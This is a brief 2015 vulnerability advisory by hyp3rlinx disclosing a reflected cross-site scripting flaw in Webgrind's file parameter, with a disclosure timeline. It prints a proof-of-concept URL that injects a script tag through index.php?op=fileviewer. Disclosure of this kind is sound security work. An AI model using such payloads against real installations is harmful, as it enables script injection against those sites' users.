Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt Vendor: https://github.com/jokkedk/webgrind Product: Webgrind is a Xdebug Profiling Web Frontend in PHP. Advisory Information: ===================================================== Webgrind is vulnerable to cross site scripting attacks. Exploit code: ============== http://localhost/webgrind/index.php?op=fileviewer&file=%3Cscript%3Ealert('XSS hyp3rlinx')%3C/script%3E Disclosure Timeline: ================================== Vendor Notification May 19, 2015 May 20, 2015: Public Disclosure Severity Level: =============== Med Description: ============ Request Method(s): [+] GET Vulnerable Product: [+] Webgrind Vulnerable Parameter(s): [+] file=[XSS] Affected Area(s): [+] Current user. ============================== (hyp3rlinx)
